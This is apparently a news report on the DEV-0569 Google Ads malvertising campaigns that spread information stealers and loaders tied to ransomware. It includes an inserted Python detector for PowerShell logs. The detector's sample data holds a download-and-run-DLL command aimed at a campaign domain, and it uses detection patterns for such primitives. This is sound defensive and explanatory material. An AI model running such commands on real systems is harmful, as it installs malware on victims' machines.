A threat actor tracked as DEV-0569 uses Google Ads in widespread, ongoing advertising campaigns to distribute malware, steal victims’ passwords, and ultimately breach networks for ransomware attacks.
These ads pretend to be websites for popular software, such as LightShot, Rufus, 7-Zip, FileZilla, LibreOffice, AnyDesk, Awesome Miner, TradingView, WinRAR and VLC.
Clicking on the ads takes visitors to websites that appear as download portals or copies of the software’s legitimate websites, as shown below.
However, when you click on the download links, you usually download an MSI file that installs various malware depending on the campaign.
The list of malware installed in these campaigns so far includes RedLine Stealer, Gozi/Ursnif, Vidar, and possibly, Cobalt Strike and ransomware.
While it appears that many threat actors are abusing the Google Ads platform to distribute malware, two particular campaigns stand out because their infrastructure has previously been associated with ransomware attacks.
From Google ads to ransomware attacks
In February 2022, Mandiant discovered a malware distribution campaign using SEO poisoning to rank websites impersonating popular apps in search results.
If a user were to install the software offered by these pages, it would execute a new malware downloader called BatLoader, which launches a multi-step infection process that ultimately provides the threat actors with initial access to the victims’ networks.
Later that year, Microsoft reported that the threat actors behind BatLoader, tracked as DEV-0569, began using Google ads to promote their malicious websites. Even worse, Microsoft said that these infections ultimately led to the deployment of Royal Ransomware on breached networks.
“Recent activity by the threat actor that Microsoft is tracking as DEV-0569, known to distribute various payloads, led to the deployment of the Royal ransomware, which first appeared in September 2022 and is distributed by multiple threat actors,” warned Microsoft in their report.
Researchers believe that DEV-0569 is an initial access broker that uses its malware distribution system to breach corporate networks. They use this access in their own attacks or sell it to other malicious actors, such as the Royal ransomware gang.
- bitbucket(.)org/ganhack123/load/downloads
- ads-check(.)com (used for tracking Google ads statistics)
Fast forward to January 21, 2023, when CronUp researcher Germán Fernández noted that recent Google ads promoting popular software led to malicious websites utilizing infrastructure operated by the DEV-0569 threat actors.
1/ DEV-0569, current distribution by #GoogleAds.
(No more BatLoader in the infection chain) pic.twitter.com/mYp8hSU7FH
— Germán Fernández (@1ZRR4H) January 21, 2023
While malicious installers in this campaign no longer use BatLoader, like the previous campaigns seen by Microsoft, they install an information stealer (RedLine Stealer) and then a malware downloader (Gozi/Ursnif).
In the current campaign, RedLine is used to steal data, such as passwords, cookies and crypto wallets, while Gozi/Ursnif is used to download additional malware.
Fernández told BleepingComputer that he linked these new campaigns to DEV-0569 because they used the same bitbucket repository and the ads-check(.)com URL used in the reported November/December 2022 campaigns.
Fernández did not wait long enough to see whether Cobalt Strike and Royal Ransomware would be installed. However, he told BleepingComputer that he believed the hackers would eventually use the Gozi infection to drop Cobalt Strike, as BatLoader did in previous campaigns.
Fernández also accessed the web panel DEV-0569 uses to track its malware distribution campaign and shared screenshots on Twitter. These screenshots showed the legitimate programs being spoofed and the many victims worldwide who were infected every day.
Asked how many people were infected by this campaign based on the website’s statistics, he said it was only possible to estimate the number.
“They clean the panel data every campaign day, but there is data that could give us an idea: it is the correlative identifier of the records (it could be an estimated value for the number of victims from this panel; in this case, today’s last value is 63576),” Fernández told BleepingComputer.
Another campaign related to CLOP ransomware
To make matters worse, Fernández discovered that a different but similar Google ads campaign used infrastructure previously used by a threat group tracked as TA505, which is known to distribute the CLOP ransomware.
In this Google ad campaign, the threat actors distribute malware through websites pretending to be popular software, such as AnyDesk, Slack, Microsoft Teams, TeamViewer, LibreOffice, Adobe, and, oddly enough, websites for W-9 IRS forms.
A list of domains in this campaign tracked by CronUp is available on this GitHub page.
When this campaign’s malware is installed, it runs a PowerShell script that downloads and executes a DLL from the website download-cdn(.)com, which TA505 previously used.
However, Proofpoint threat researcher Tommy Madjar told BleepingComputer that this domain has changed ownership in the past, and it’s unclear if TA505 is still using it.
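A defender-side illustration of the chain described above (added example, not code from the article or from CronUp): it scores constructed PowerShell script-block log entries for the download-then-execute-a-DLL pattern and weights any contact with the download-cdn(.)com domain named in the article. The sample log lines, the scoring weights and the threshold are assumptions made for this example; because the domain's ownership is uncertain, the domain match is only one signal among several rather than a verdict on its own.

```python
import re

# Constructed sample PowerShell script-block log entries (event id 4104); not real
# captures from the campaign. Entry 1 mimics the chain the article describes:
# a script downloads a DLL from download-cdn(.)com and then executes it.
SAMPLE_EVENTS = [
    "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object",
    "(New-Object Net.WebClient).DownloadFile('https://download-cdn.com/u/lib.dll', "
    "\"$env:TEMP\\lib.dll\"); rundll32.exe \"$env:TEMP\\lib.dll\",DllMain",
    "Invoke-WebRequest -Uri https://example.org/report.pdf -OutFile report.pdf",
    "$b = [IO.File]::ReadAllBytes('C:\\t\\a.dll'); [Reflection.Assembly]::Load($b)",
]

DOWNLOAD_APIS = re.compile(
    r"DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
DLL_EXEC = re.compile(r"rundll32|regsvr32|\[Reflection\.Assembly\]::Load", re.I)
DLL_REF = re.compile(r"\.dll\b", re.I)
URL_HOST = re.compile(r"https?://([^/'\"\s:]+)", re.I)
# Domain named in the article; a real deployment would load this list from threat intel.
KNOWN_DOMAINS = {"download-cdn.com"}


def matches_known_domain(host):
    """True if host equals or is a subdomain of a tracked domain."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in KNOWN_DOMAINS)


def score_script(script):
    """Score one script block; returns (score, reasons). Weights are assumptions."""
    score, reasons = 0, []
    if DOWNLOAD_APIS.search(script) and DLL_REF.search(script):
        score += 2
        reasons.append("download API used together with a .dll path")
    if DLL_EXEC.search(script):
        score += 1
        reasons.append("DLL execution primitive present")
    if any(matches_known_domain(h) for h in URL_HOST.findall(script)):
        score += 2
        reasons.append("contact with a domain associated with the campaign")
    return score, reasons


def flag_events(events, threshold=3):
    """Return [(index, score, reasons)] for scripts scoring at or above threshold."""
    hits = []
    for i, script in enumerate(events):
        score, reasons = score_script(script)
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits


if __name__ == "__main__":
    for i, score, reasons in flag_events(SAMPLE_EVENTS):
        print(f"event {i}: score {score}: {'; '.join(reasons)}")
```

Only the constructed download-and-rundll32 entry crosses the threshold; the reflective load of a local DLL scores but does not alert on its own, which is the kind of tuning decision a real deployment would revisit against its own baseline.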
Regardless of who owns these domains, the large number of malicious Google ads displayed in search results is becoming a huge problem for both consumers and businesses.
Because these campaigns are used to gain initial access to corporate networks, they can lead to various attacks, such as data theft, ransomware, and even destructive attacks that disrupt a company’s operations.
While BleepingComputer has not contacted Google regarding this article, we did contact them last week regarding a similar malware campaign distributed through Google ads.
Google told us at the time that the platform’s policies are designed and enforced to prevent brand imitation.
“We have robust policies banning ads that try to avoid our enforcement by masking the identity of the advertiser and impersonating other brands, and we vigorously enforce them. We reviewed the ads in question and removed them,” Google told BleepingComputer.
The good news is that Google removes these ads as they are reported and detected.
The bad news is that the threat actors are constantly launching new ad campaigns and new websites, making it a giant game of whack-a-mole, and it doesn’t feel like Google is winning.